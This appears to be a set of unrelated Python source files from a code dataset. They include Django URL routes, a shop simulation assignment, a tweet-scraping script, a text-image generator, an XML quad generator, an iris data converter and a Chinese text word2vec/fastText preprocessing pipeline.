lib[1].theory_create_propagator(ctypes.c_void_p(prg._to_c))\n\n    def main(self, prg, files):\n        \"\"\"\n        Forwards the incremental solving loop.\n        This function implements the Application.main() function as required by\n        clingo.clingo_main().\n        \"\"\"\n        self.__load_propagators(prg)\n\n        self.theory_main(prg, files)\n\n\n","sub_path":"tloader.py","file_name":"tloader.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"432984508","text":"# posts/urls.py\n\nfrom django.urls import path\n\nfrom .views import ModelPageView, CreatePostView, PhotoPageView, PhotoCreatePostView # new\nimport posts.views\n\n# from .filters import Userfilter\n#post url\n\n\nurlpatterns = [\n    path('model/', ModelPageView.as_view(), name='model'),\n    path('model/post/', CreatePostView.as_view(), name='post'),\n    path('model/detail/<int:pk>/', posts.views.detail, name=\"detail\"),  # assumption: the URL converter was stripped from this copy; <int:pk> matches the detail view\n\n    path('model/filter/orient/', 
posts.views.filter_orient, name=\"filter_orient\"),\n    path('model/filter/western/', posts.views.filter_western, name=\"filter_western\"),\n    path('model/filter/classic/', posts.views.filter_classic, name=\"filter_classic\"),\n    path('model/filter/modern/', posts.views.filter_modern, name=\"filter_modern\"),\n\n    path('photo/', PhotoPageView.as_view(), name=\"photo\"),\n    path('photo/post/', PhotoCreatePostView.as_view(), name=\"photo_post\"),\n    path('photo/detail/<int:pk>/', posts.views.photo_detail, name=\"photo_detail\"),  # assumption: converter restored as for the model detail route\n\n    path('photo/filter/orient/', posts.views.photo_filter_orient, name=\"photo_filter_orient\"),\n    path('photo/filter/western/', posts.views.photo_filter_western, name=\"photo_filter_western\"),\n    path('photo/filter/classic/', posts.views.photo_filter_classic, name=\"photo_filter_classic\"),\n    path('photo/filter/modern/', posts.views.photo_filter_modern, name=\"photo_filter_modern\"),\n\n    path('', posts.views.home, name=\"home\"),\n\n]","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"25408453","text":"from dataclasses import dataclass, field\nfrom typing import List\nimport csv\n\n# Data containers for variable information\n@dataclass \nclass Product:\n    name: str\n    price: float = 0.0\n\n@dataclass \nclass ProductStock:\n    product: Product\n    quantity: int\n\n@dataclass \nclass Shop:\n    cash: float = 0.0\n    stock: List[ProductStock] = field(default_factory=list)\n\n@dataclass\nclass Customer:\n    name: str = \"\"\n    budget: float = 0.0\n    shopping_list: List[ProductStock] = field(default_factory=list)\n\n# Stock shop from csv file received\ndef create_and_stock_shop():\n    shop = Shop() \n    with open(\"../stock.csv\") as csv_file:\n        csv_reader = csv.reader(csv_file, delimiter=\",\")\n        first_row = next(csv_reader)\n        shop.cash = float(first_row[0])\n        for row in csv_reader:\n            prod = Product(row[0], float(row[1]))\n            prod_st = ProductStock(prod, float(row[2]))\n            shop.stock.append(prod_st)\n    return shop\n\n# Extract data from csv file to create customer shopping list\ndef read_customer(file_path):\n    with open(file_path) as csv_file:\n        csv_reader = csv.reader(csv_file, delimiter=\",\")\n        first_row = next(csv_reader)\n        cust = Customer(first_row[0], float(first_row[1]))\n        for row in csv_reader:\n            name = row[0]\n            quantity = float(row[1])\n            prod = Product(name)\n            prod_st = ProductStock(prod, quantity)\n            cust.shopping_list.append(prod_st)\n    return cust\n\n# Print product name and price\ndef print_product(prod):\n    print(f\"\\nPRODUCT NAME: {prod.name} \\nPRODUCT PRICE: €{prod.price:.2f} \\n------------------------\")\n\ndef print_customer(cust, shop):\n    check_stock(cust, shop) # Check stock levels are adequate to cover customers order\n    calculate_costs(cust, shop) # Determine the cost of the item from the matching name in the shop\n    total_order = 0 # Create initial value of variable for total order amount\n    print(f\"Customer name is {cust.name} and they have €{cust.budget:.2f} for their budget.\\n\")\n\n    # Iterate through items in shopping list to determine price of the total order\n    for item in cust.shopping_list: \n        print(f\"{cust.name} wants {item.quantity:.0f} of the product {item.product.name}.\")\n        cost = item.quantity * item.product.price\n\n        # Check item exists in the store\n        if (cost == 0):\n            print(f\"The product {item.product.name} cannot be found. 
Please enter a name matching the shop stock shown above.\")\n main()\n\n total_order += cost\n print(f\"The cost to {cust.name} will be €{cost:.2f}.\\n\")\n\n # Check if customer has enough in budget to fulfill the order. Adjust shop cash and stock levels accordingly\n if total_order <= cust.budget:\n shop.cash += total_order\n print(f\"The total price of the order for {cust.name} is €{total_order:.2f}. Transaction complete. {cust.name} now has €{cust.budget-total_order:.2f} remaining in their budget. Shop cash is now €{shop.cash}.\\n\")\n for item in cust.shopping_list: # Iterate through individual items in shopping list\n for prod in shop.stock: # Iterate the item pulled from shopping list through the shop stock \n if item.product.name == prod.product.name: # If names are equal then adjust quantities outlined below\n prod.quantity = prod.quantity - item.quantity # Update shop quantities to reflect purchased goods taken from shop stock\n else:\n print(f\"The total price of the order for {cust.name} is €{total_order:.2f}. {cust.name} has insufficient funds to complete the transaction.\\n\")\n\ndef print_shop(shop):\n print(f\"\\nShop has €{shop.cash} in cash.\")\n\n # Iterate through objects in store to print off\n for item in shop.stock:\n print_product(item.product)\n print(f\"The Shop has {item.quantity:.0f} of the above.\\n\")\n\n# Check shop has adequate stocks to fulfill order\ndef check_stock(cust, shop):\n for item in cust.shopping_list:\n for prod in shop.stock:\n if item.product.name == prod.product.name and item.quantity > prod.quantity:\n print(f\"We do not have enough stock of {item.product.name}, please re-select products to continue with your purchase.\")\n custmenu()\n \n # Calculate each items price from the shop list\ndef calculate_costs(cust, shop):\n for shop_item in shop.stock: # Iterate through individual items in shop stock \n for list_item in cust.shopping_list: # Iterate the item pulled from shop stock list through the customer shopping list \n if (list_item.product.name == shop_item.product.name): # If names are equal then adjust price in the shopping list outlined below\n list_item.product.price = shop_item.product.price # Update shopping list price to match shop price\n\n# Live mode for customer to enter their own orders\ndef live_mode():\n cust_name = input(\"What is your name? \")\n\n # Check for input error by user\n try:\n budget= float(input(f\"And what is your budget today {cust_name}: €\"))\n except ValueError:\n print(\"\\nPlease enter a float value for the budget.\\n\")\n live_mode()\n\n cust= Customer(cust_name, budget)\n print(\"That's great! The available products are listed below with quantities and prices noted.\")\n print_shop(shop)\n shopping_list=[] # Create empty array for input\n additional_items = \"Y\" # Create starting condition to open while loop\n while (additional_items == \"Y\"):\n name = input(\"What would you like to purchase? Please note product description must match exactly: \")\n \n # Check for input error by user\n try:\n quantity = int(input(\"And how many would you like? \"))\n except ValueError:\n print(\"\\nPlease enter an integer value for the quantity. Restarting order process...\\n\")\n live_mode()\n\n prod = Product(name)\n prod_st = ProductStock(prod, quantity)\n cust.shopping_list.append(prod_st)\n additional_items = input(\"Would you like to order additional items? 
Y/N \\n\")\n\n return cust\n\n# Main menu displayed when shop is run\ndef display_menu():\n print(\"MENU\")\n print(\"====\")\n print(\"1- Choose pre loaded baskets\")\n print(\"2- Live mode\")\n print(\"3- Check shop cash\")\n print(\"4- Check shop cash & stock\")\n print(\"5- Exit\")\n\n# Main menu options\ndef main():\n while True:\n display_menu()\n choice = input(\"Choice: \")\n\n if (choice == \"1\"):\n custmenu()\n\n elif (choice == \"2\"):\n cust= live_mode()\n print_customer(cust, shop)\n\n elif (choice == \"3\"):\n print(f\"\\nThe shop has €{shop.cash:.2f}\\n\")\n \n elif (choice == \"4\"):\n print_shop(shop) \n\n elif (choice == \"5\"):\n exit()\n\n else:\n print(\"This is not a valid selection\\n\")\n\n# Sub menu for displaying customer pre loaded baskets \ndef display_custmenu():\n print(\"1- Standard\")\n print(\"2- Not enough in budget\")\n print(\"3- Quantities selected too great\")\n print(\"4- Back\")\n print(\"5- Exit\")\n\n# Sub menu options\ndef custmenu():\n while True:\n print(\"\\nCustomer test csv files available-\")\n display_custmenu()\n customer_type = input(\"Choice: \")\n if (customer_type == \"1\"):\n cust= read_customer(\"../Standard.csv\")\n print_customer(cust, shop)\n elif (customer_type == \"2\"):\n cust= read_customer(\"../Budget.csv\")\n print_customer(cust, shop)\n elif (customer_type == \"3\"):\n cust= read_customer(\"../Quantity.csv\")\n print_customer(cust, shop)\n elif (customer_type == \"4\"):\n main()\n elif (customer_type == \"5\"):\n exit()\n else:\n print(\"This is not a valid selection. Please re-select.\\n\")\n\nif __name__ == \"__main__\":\n shop = create_and_stock_shop()\n print_shop(shop)\n main()","sub_path":"G00376322 - Ian Wafer - Assignment 1/python/shop.py","file_name":"shop.py","file_ext":"py","file_size_in_byte":8116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"345584293","text":"import tweepy\nimport csv\nimport pandas as pd\n\n# Enter authentification credentials:\nconsumer_key = 'CONSUMER_KEY'\nconsumer_secret = 'CONSUMER_SECRET'\naccess_token = 'ACCESS_TOKEN'\naccess_token_secret = 'ACCESS_SECRET'\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth,wait_on_rate_limit=True)\n \n# Open CSV file to append new rows with data (based on the query): \nwith open('Brexit_.csv', 'a') as outfile:\n # Searching a selected number of tweets (e.g., 2000) containing the keyword 'Brexit' \n # Restriction on date/period & language\n for tweet in tweepy.Cursor(api.search, q=\"brexit\", \n lang=\"en\",\n since=\"2017-11-20\",\n until=\"2017-11-26\").items(2000):\n csv_write = csv.writer(outfile, delimiter=',', quotechar='\"')\n csv_write.writerow([tweet.id, \n tweet.author.screen_name,\n tweet.author.verified,\n tweet.author.followers_count, \n tweet.created_at, \n tweet.text,\n tweet.in_reply_to_screen_name,\n tweet.in_reply_to_status_id,\n tweet.source,\n tweet.is_quote_status,\n tweet.retweeted,\n tweet.favorite_count,\n tweet.retweet_count,\n tweet.author.location])\n","sub_path":"twitter_scraper_csv.py","file_name":"twitter_scraper_csv.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"91852086","text":"import cv2\nimport math\nimport os\nimport random\nimport numpy as np\n\nfrom PIL import Image, ImageFont, ImageDraw, ImageFilter\n\ndef create_and_save_sample(index, text, font, out_dir, height, 
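# (added) notes on the remaining parameters, inferred from the function body:\n                           # skewing_angle / random_skew control the text rotation, blur / random_blur set\n                           # the Gaussian blur radius, and background_type selects 0 = gaussian noise,\n                           # 1 = plain white, anything else = quasicrystal.\n                           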
extension, skewing_angle, random_skew, blur, random_blur, background_type):\n image_font = ImageFont.truetype(font=os.path.join('fonts', font), size=32)\n text_width, text_height = image_font.getsize(text)\n\n txt_img = Image.new('L', (text_width, text_height), 255)\n\n txt_draw = ImageDraw.Draw(txt_img)\n\n txt_draw.text((0, 0), text, fill=random.randint(1, 80), font=image_font)\n\n random_angle = random.randint(0-skewing_angle, skewing_angle)\n\n rotated_img = txt_img.rotate(skewing_angle if not random_skew else random_angle, expand=1)\n\n new_text_width, new_text_height = rotated_img.size\n\n # We create our background a bit bigger than the text\n background = None\n\n if background_type == 0:\n background = create_gaussian_noise_background(new_text_height + 10, new_text_width + 10)\n elif background_type == 1:\n background = create_plain_white_background(new_text_height + 10, new_text_width + 10)\n else:\n background = create_quasicrystal_background(new_text_height + 10, new_text_width + 10)\n\n mask = rotated_img.point(lambda x: 0 if x == 255 or x == 0 else 255, '1')\n\n background.paste(rotated_img, (5, 5), mask=mask)\n\n # Create the name for our image\n image_name = '{}_{}.{}'.format(text, str(index), extension)\n\n # Resizing the image to desired format\n new_width = float(text_width + 10) * (float(height) / float(text_height + 10))\n image_on_background = background.resize((int(new_width), height), Image.ANTIALIAS)\n\n final_image = image_on_background.filter(\n ImageFilter.GaussianBlur(\n radius=(blur if not random_blur else random.randint(0, blur))\n )\n )\n\n # Save the image\n final_image.convert('RGB').save(os.path.join(out_dir, image_name))\n\ndef create_gaussian_noise_background(height, width):\n \"\"\"\n Create a background with Gaussian noise (to mimic paper)\n \"\"\"\n\n # We create an all white image\n image = np.ones((height, width)) * 255\n\n # We add gaussian noise\n cv2.randn(image, 235, 10)\n\n return Image.fromarray(image).convert('L')\n\ndef create_plain_white_background(height, width):\n \"\"\"\n Create a plain white background\n \"\"\"\n\n return Image.new(\"L\", (width, height), 255)\n\ndef create_quasicrystal_background(height, width):\n \"\"\"\n Create a background with quasicrystal (https://en.wikipedia.org/wiki/Quasicrystal)\n \"\"\"\n\n image = Image.new(\"L\", (width, height))\n pixels = image.load()\n\n frequency = random.random() * 30 + 20 # frequency\n phase = random.random() * 2 * math.pi # phase\n rotation_count = random.randint(10, 20) # of rotations\n\n for kw in range(width):\n y = float(kw) / (width - 1) * 4 * math.pi - 2 * math.pi\n for kh in range(height):\n x = float(kh) / (height - 1) * 4 * math.pi - 2 * math.pi\n z = 0.0\n for i in range(rotation_count):\n r = math.hypot(x, y)\n a = math.atan2(y, x) + i * math.pi * 2.0 / rotation_count\n z += math.cos(r * math.sin(a) * frequency + phase)\n c = int(255 - round(255 * z / rotation_count))\n pixels[kw, kh] = c # grayscale\n return image\n","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"135438800","text":"#variables\nnameToWrite = \"shapes.xml\"\npanelsWide = 26 #19 #with half panels #28 #23\npanelsHigh = 6\n #in pixels, must be recaclulated per resolution\npanelSize = 125 #95 #130\npanelTex = 125\npanelGap = 7 #7\npanelSplit = 21 #panelGap *7\npanelSplitSmall = 15\npanelOffset = 0\n\n#shorthand xml tags\nrS = \"\\n\"\nrE = \"\\n\"\nsS = 
\"\\t\\n\\t\\tquad\\n\"\nsE = \"\\t\\n\"\nvS = \"\\t\\t\\n\"\nvE = \"\\t\\t\\n\"\npS = \"\\t\\t\\n\"\npE = \"\\t\\t\\n\"\ndS = \"\\t\\t\\t\\n\"\n\n#init and add preamble\nidCounter = 0\ntoWrite = rS\n\n#loop over quads \nfor i in range( panelsHigh ):\n for j in range( panelsWide ) :\n toWrite += sS + str(idCounter) + sM + vS\n #projection verts\n if i < 2:\n toWrite += dS + str(j*panelSize + j*panelGap) +dM+ str(i*panelSize + i*panelGap) + dE\n toWrite += dS + str(j*panelSize + panelSize + j*panelGap) +dM+ str(i*panelSize + i*panelGap) + dE\n toWrite += dS + str(j*panelSize + panelSize + j*panelGap) +dM+ str(i*panelSize + panelSize + i*panelGap) + dE\n toWrite += dS + str(j*panelSize + j*panelGap) +dM+ str(i*panelSize + panelSize + i*panelGap) + dE\n elif i < 5:\n toWrite += dS + str(j*panelSize + j*panelGap) +dM+ str(i*panelSize + i*panelGap + panelSplit) + dE\n toWrite += dS + str(j*panelSize + panelSize + j*panelGap) +dM+ str(i*panelSize + i*panelGap + panelSplit) + dE\n toWrite += dS + str(j*panelSize + panelSize + j*panelGap) +dM+ str(i*panelSize + panelSize + i*panelGap + panelSplit) + dE\n toWrite += dS + str(j*panelSize + j*panelGap) +dM+ str(i*panelSize + panelSize + i*panelGap + panelSplit) + dE\n else:\n toWrite += dS + str(j*panelSize + j*panelGap) +dM+ str(i*panelSize + i*panelGap + panelSplit + panelSplitSmall) + dE\n toWrite += dS + str(j*panelSize + panelSize + j*panelGap) +dM+ str(i*panelSize + i*panelGap + panelSplit + panelSplitSmall) + dE\n toWrite += dS + str(j*panelSize + panelSize + j*panelGap) +dM+ str(i*panelSize + panelSize + i*panelGap + panelSplit + panelSplitSmall) + dE\n toWrite += dS + str(j*panelSize + j*panelGap) +dM+ str(i*panelSize + panelSize + i*panelGap + panelSplit + panelSplitSmall) + dE\n\n toWrite += vE + pS\n #texture verts\n toWrite += dS + str(j*panelTex) + dM + str(i*panelTex) + dE\n toWrite += dS + str(j*panelTex + panelTex) + dM + str(i*panelTex) + dE\n toWrite += dS + str(j*panelTex + panelTex) + dM + str(i*panelTex + panelTex) + dE\n toWrite += dS + str(j*panelTex) + dM + str(i*panelTex + panelTex) + dE\n\n toWrite += pE + sE\n idCounter += 1\n\n#add post everything\ntoWrite += rE\n\nfileOut = open( nameToWrite, \"w\" )\nfileOut.write( toWrite )\nfileOut.close()","sub_path":"machine.py","file_name":"machine.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"418613480","text":"import numpy as np\r\nimport pandas as pd\r\nimport os\r\nfile_dir = os.path.dirname(\"D:/LTK_AI/LTK_AI_Study/AI_Study/Data/\")\r\nsave_dir = os.path.dirname(\"D:/LTK_AI/LTK_AI_Study/AI_Study/Data/Numpy/\")\r\n\r\ndef name_class(y):\r\n return_list = []\r\n for i in range(len(y)):\r\n if y[i] == \"Iris-setosa\":\r\n return_list.append(0)\r\n elif y[i] == \"Iris-versicolor\":\r\n return_list.append(1)\r\n elif y[i] == \"Iris-virginica\":\r\n return_list.append(2)\r\n return return_list\r\n\r\niris_data = pd.read_csv(file_dir+\"/iris2.csv\", encoding=\"utf-8\")\r\n\r\n\r\nx = np.array(iris_data.iloc[:,:-1])\r\ny = name_class(iris_data.iloc[:,-1])\r\nprint(y)\r\n\r\ny = np.array(y,dtype=np.int32)\r\niris2_data = np.c_[x,y]\r\nnp.save(save_dir+\"/iris2_data.npy\",iris2_data)\r\n\r\niris2_data = np.load(save_dir+\"/iris2_data.npy\")","sub_path":"Day0821/T04_Iris_Numpy.py","file_name":"T04_Iris_Numpy.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"636982310","text":"import 
pandas as pd\nimport numpy as np\nimport jieba\nfrom gensim.models import word2vec\nfrom gensim import corpora\nimport os\nimport re\nfrom tqdm import tqdm\nfrom sklearn.model_selection import train_test_split\n\nclass TrainDataPrecondition(object):\n def __init__(self):\n self.seg_list = []\n self.stopWords = set()\n self.trainData = None\n self.carveData = []\n self.model = None\n self.wv = None\n self.corpus = None\n self.w2vDim = 100\n self.EmbeddingMatrix = []\n self.classNum = None\n self.vocbSize = None\n self.maxWordNum = 0\n self.testData = None\n \n\n def getTrainData(self, path='./data_LC/', name=\"train.tsv\"):\n print(\"Reading TrainData\")\n trainData = pd.read_table(path + name,\n encoding=\"gb18030\",\n quoting=3\n )\n self.trainData = trainData\n trainType = trainData['TYPE']\n return trainData['ITEM_NAME']\n \n def getTestData(self, path='./data_LC/', name=\"test.tsv\"):\n print(\"Reading TestData\")\n testData = pd.read_table(path + name,\n encoding=\"gb18030\",\n quoting=3\n )\n self.testData = testData\n return testData\n \n def _stopwordslist(self, stopwordpath):\n print(\"insert stopwords\")\n stopwords = [line.strip() for line in open(stopwordpath, 'r', encoding='gb18030').readlines()]\n self.stopWords = set(stopwords)\n\n def _suggestFreq(self):\n freq = ['腾讯QQ', 'q币', 'qq币', 'Q币', 'QQ币', 'QB', 'qb', 'DVD','黄钻','红钻','黑钻','绿钻','狗粮','成犬'\n ,'狗盆','猫碗','狗碗','泡茶','煮水','煮茶','蓝钻','紫钻']\n for word in freq:\n jieba.suggest_freq(word, True)\n\n def outletCarveData(self, path, name, num):\n if not os.path.exists(path):\n os.mkdir(path)\n saveData = pd.DataFrame(self.seg_list)\n saveData.to_csv(path + str(num) + name,\n encoding=\"gb18030\",\n header=False,\n index=False)\n del saveData\n del self.seg_list\n self.seg_list = []\n #将pandas数据存成文件\n\n def outletItemCarve(self,\n stopWordPath=\"./data_preprocess/chineseStopWords.txt\",\n loop=0,\n carveDataPath=\"./data_preprocess/carve/\",\n carveDataName=\"carve.tsv\",\n outlet=True,\n batch=False):\n self._stopwordslist(stopWordPath)\n self._suggestFreq()\n num = 1\n items = tqdm(pd.DataFrame(self.trainData, columns=['ITEM_NAME'])['ITEM_NAME'])\n if loop == 0:\n loop = len(items)\n for item in items:\n seg = jieba.lcut(self.clean_numbers(item), cut_all=False)\n\n newSeg = []\n while (len(seg)):\n #print(len(seg))\n word = seg.pop(0)\n if word != '' and word != ' ':\n if word not in self.stopWords:\n if word != '\\t' and word != '\\r\\n':\n newSeg.append(word)\n self.seg_list.append(newSeg)\n\n del newSeg\n\n if num >= loop:\n self.outletCarveData(carveDataPath, carveDataName, num)\n return None\n\n if batch:\n if num % 10000 == 0 and outlet:\n self.outletCarveData(carveDataPath, carveDataName, num)\n\n num += 1\n\n\n def getCarveData(self, path=\"./data_preprocess/carve/\", addNone=False):\n print(\"getCarveData\")\n for dirpath, dirnames, filenames in os.walk(path):\n for filepath in filenames:\n getCarveData = pd.read_csv(dirpath+filepath,\n encoding=\"gb18030\",\n header=None,\n low_memory=False\n )\n getCarveData = getCarveData.values\n #print(\"getData:\", getCarveData[0])\n\n for words in getCarveData:\n tempWords = []\n for word in words:\n if word != None:\n if isinstance(word, str):\n tempWords.append(word)\n elif addNone:\n tempWords.append('')\n self.carveData.append(tempWords)\n #print(len(tempWords))\n #print(tempWords)\n if len(tempWords) > self.maxWordNum:\n self.maxWordNum = len(tempWords)\n #print(self.maxWordNum)\n del tempWords\n #print(\"carveData:\", self.carveData[0])\n del getCarveData\n return 
self.carveData\n\n    def outletTypeData(self, path=\"./data_preprocess/type/\", name=\"type.tsv\"):\n        if not os.path.exists(path):\n            os.mkdir(path)\n        typeData = pd.DataFrame(self.trainData, columns=['TYPE'])\n        # Save the pandas data to a file\n        typeData.to_csv(path + name,\n                        encoding=\"gb18030\",\n                        header=False,\n                        index=False)\n\n    def getTypeData(self, path=\"./data_preprocess/type/\", name=\"type.tsv\"):\n        print(\"getTypeData\")\n        typeData = pd.read_csv(path + name,\n                               encoding=\"gb18030\",\n                               header=None)\n        typeData = typeData.values\n\n        typeList = [type[0] for type in typeData]\n        typeSet = set(typeList)\n\n        type2typeidx = {types: idx for idx, types in enumerate(typeSet)}\n        typeidx2type = {idx: types for (types, idx) in type2typeidx.items()}\n        #idx2typeidx = {idx: type2typeidx[types] for idx, types in enumerate(typeList)}\n        typeidxList = [type2typeidx[types] for types in typeList]\n        self.classNum = len(typeidxList)\n        with open('./data_preprocess/type.txt','w+') as f:\n            for idx, tp in typeidx2type.items():\n                f.write(str(idx)+ \" \"+ tp + \"\\n\")\n        return typeidx2type, typeidxList\n\n    def w2vTraining(self, loop=5, path=\"./data_preprocess/model/\", name=\"model.model\"):\n        flag = True\n        times = 0\n        while times < loop:\n            times += 1\n            if flag:\n                flag = False\n                if os.path.exists(path + name):\n                    self.getModel(path, name)\n                else:\n                    print(\"w2vTraining\")\n                    #print(\"training NSmodelCBOW\")\n                    print(\"Creating model, will save to %s%s\" % (path, name))\n                    print(\"Training pass %d\" % times)\n                    self.model = word2vec.Word2Vec(self.carveData, workers=4,\n                                                   hs=0, min_count=3,\n                                                   window=6, size=self.w2vDim,\n                                                   sg=0, iter=1)\n                    # print(\"training NSmodelSG\")\n                    # NSmodelSG = word2vec.Word2Vec(self.carveData, hs=0, min_count=2, window=6, size=100, sg=1, iter=8)\n                    # print(\"training HSmodelCBOW\")\n                    # HSmodelCBOW = word2vec.Word2Vec(self.carveData, hs=1, min_count=2, window=6, size=100, sg=0, iter=10)\n                    # print(\"training HSmodelSG\")\n                    # HSmodelSG = word2vec.Word2Vec(self.carveData, hs=1, min_count=2, window=6, size=100, sg=1, iter=8)\n                    self._saveModel(self.model, path, name)\n                    continue\n            print(\"Training pass %d\" % times)\n            self.model.build_vocab(self.carveData, update=True)\n            self.model.train(self.carveData,\n                             total_examples=self.model.corpus_count,\n                             epochs=1)\n            self._saveModel(self.model, path, name)\n\n\n    def trainingTest(self, model=None):\n        if model is None:\n            model = self.model\n        def nearestWord(searchWord, count=5):\n            req_count = count\n            for key in model.wv.similar_by_word(searchWord, topn=100):\n                if len(key[0]) == 3:\n                    req_count -= 1\n                    print(key[0], key[1])\n                    if req_count == 0:\n                        break\n\n        def wordSimilaity(string1, string2):\n            #cbow,\n            ns_cbow = model.wv.similarity(string1, string2)\n            #self.savemodel(ns_cbow, \"./data_preprocess/model/ns_cbow.model\")\n\n            #ns_sg = NSmodelSG.wv.similarity(string1, string2)\n            #self.savemodel(ns_sg, \"./data_preprocess/model/ns_sg.model\")\n\n            #hs_cbow = HSmodelCBOW.wv.similarity(string1, string2)\n            #self.savemodel(hs_cbow, \"./data_preprocess/model/hs_cbow.model\")\n\n            #hs_sg = HSmodelSG.wv.similarity(string1, string2)\n            #self.savemodel(hs_sg, \"./data_preprocess/model/hs_sg.model\")\n\n            print(\"ns_cbow:\", ns_cbow)\n            #print(\"ns_sg:\", ns_sg)\n            #print(\"hs_cbow:\", hs_cbow)\n            #print(\"hs_sg:\", hs_sg)\n\n        searchWord = '爱普生'\n        print('NSmodelCBOW')\n        nearestWord(searchWord)\n        #print('\\nNSmodelSG')\n        #nearestWord(NSmodelSG, searchWord)\n        #print('\\nHSmodelCBOW')\n        #nearestWord(HSmodelCBOW, searchWord)\n        #print('\\nHSmodelSG')\n        #nearestWord(HSmodelSG, searchWord)\n\n        wordSimilaity(\"爱普生\", \"EPSON\")\n\n    def _saveModel(self, 
model, path=\"./data_preprocess/model/\", name=\"model.model\"):\n        if not os.path.exists(path):\n            os.mkdir(path)\n        model.save(path+name)\n\n    def getModel(self, path=\"./data_preprocess/model/\", name=\"model.model\"):\n        if os.path.exists(path+name):\n            self.model = word2vec.Word2Vec.load(path+name)\n\n    # deprecated\n    def getCorpora(self):\n        print(\"getCorpora\")\n        dictionary = corpora.Dictionary(self.carveData)\n        corpus_idx = [dictionary.doc2idx(text) for text in self.carveData]\n        corpus_bow = [dictionary.doc2bow(text) for text in self.carveData]\n\n        return corpus_idx\n\n    def saveModelAsWordVector(self, path=\"./data_preprocess/wordVec/\", name=\"wordVec.wv\"):\n        #once trained, the model can be converted to plain word vectors: smaller on disk and faster to load\n        print(\"saveModelAsWordVector\")\n        if not os.path.exists(path):\n            os.mkdir(path)\n        self.model.wv.save(path + name)\n\n    def getWordVector(self, path=\"./data_preprocess/wordVec/\", name=\"wordVec.wv\"):\n        if os.path.exists(path+name):\n            self.wv = KeyedVectors.load(path+name, mmap='r')  # memory-mapped\n        return self.wv\n\n    def getVecList(self):\n        #uses the word vectors; the model must first be converted to wv\n        print(\"getVecList\")\n        vecList = []\n        for words in self.carveData:\n            tempList = []\n            for word in words:\n                try:\n                    tempList.append(self.wv[word])\n                except KeyError:\n                    pass  # rare words excluded during training\n            vecList.append(tempList)\n            del tempList\n        return vecList\n\n    def getDictionary(self, carveData=None):\n        if carveData is None:\n            carveData = self.carveData\n        wordSet = set([word for words in carveData for word in words])\n        word2wordidx = {word: idx for idx, word in enumerate(wordSet)}\n        wordidx2word = {idx: word for (word, idx) in word2wordidx.items()}\n        return word2wordidx, wordidx2word\n\n    def getCorpus(self, word2wordidx,\n                  addNone=False, matrix=False,\n                  carveData=None, wv=None,\n                  maxWordNum=None):\n\n        if carveData is None:\n            carveData = self.carveData\n        if wv is None:\n            wv = self.wv\n\n        if matrix:\n\n            if maxWordNum is None:\n                maxWordNum = self.maxWordNum\n\n            self.corpus = np.zeros([len(carveData), maxWordNum])\n            i = 0\n            for words in carveData:\n                j = 0\n                for word in words:\n                    if word in self.wv:\n                        self.corpus[i][j] = word2wordidx[word]\n                    elif addNone:\n                        self.corpus[i][j] = word2wordidx['']\n                    j += 1\n                for last in range(j, maxWordNum):\n                    self.corpus[i][last] = word2wordidx['']\n                i += 1\n\n        else:\n            self.corpus = []\n            for words in self.carveData:\n                tempList = []\n                for word in words:\n                    if word in self.wv:\n                        tempList.append(word2wordidx[word])\n                self.corpus.append(tempList)\n                del tempList\n\n        return self.corpus\n\n\n    def getEmbeddingMatrix(self, wordidx2word):\n        self.vocbSize = len(wordidx2word)\n        for index in range(self.vocbSize):\n            if wordidx2word[index] in self.wv:\n                self.EmbeddingMatrix.append(self.wv[wordidx2word[index]])\n            else:\n                self.EmbeddingMatrix.append([0.0 for i in range(self.w2vDim)])\n\n        return np.array(self.EmbeddingMatrix)\n    \n    def get_fasttextData(self,data = None, labels = None, path = \"./data_fasttext/\", name = 'train.txt'):\n        d_list = []\n        data = tqdm(data)\n        for i, item in enumerate(data):\n            outline = \" \".join(item) + \"\\t__label__\" + str(labels[i])\n            d_list.append(outline)\n        df = pd.DataFrame(d_list)\n        df.to_csv(path + name,index=False, encoding = 'gb18030', header = None)\n    \n    def clean_numbers(self,s):\n        #s = re.sub(r'[0-9]*[a-zA-Z]*[0-9]+[a-zA-Z]*',\" \",s)\n        s = re.sub(r'[0-9]+\\\.[0-9]+',\" \",s)\n        s = re.sub(r'[0-9]+', \" \", s)\n        pattern = re.compile(r'[a-z]+', re.I)\n        s = re.sub(pattern, lambda m: m.group(0) + \" \",s)\n        #s = re.sub('[a-z]{1,1}',\"\", s)\n        return s\n\nif __name__ == \"__main__\":\n    TDP = TrainDataPrecondition()\n    
TDP.getTrainData()\n    X_train = TDP.getCarveData()\n\n    #X_test = TDP.getTestData()\n    #TDP.outletItemCarve(loop=0)\n    #TDP.outletTypeData()\n    type_dict, type_list = TDP.getTypeData()\n    #carveData = TDP.getCarveData(\"./data_preprocess/carve/\", addNone=True)\n    y_train = type_list\n    X_tra, X_val, y_tra, y_val = train_test_split(X_train, y_train, train_size=0.8, random_state=233)\n    TDP.get_fasttextData(X_tra, y_tra, name = 'train.txt')\n    TDP.get_fasttextData(X_val, y_val, name = 'test.txt')\n    #if the model has not been trained yet, getModel is needed; once trained it is not, and trainingTest can be called to check the model\n    #incremental training is supported\n    #TDP.w2vTraining(loop=1, path=\"./data_preprocess/model/\", name=\"NSmodelCBOW_mc3w6.model\")\n    #TDP.getModel(path=\"./data_preprocess/model/\", name=\"NSmodelCBOW_mc3w6.model\")\n    #TDP.trainingTest()\n\n    # once trained, the model can be converted to plain word vectors (smaller and faster); the conversion also requires getWordVector()\n    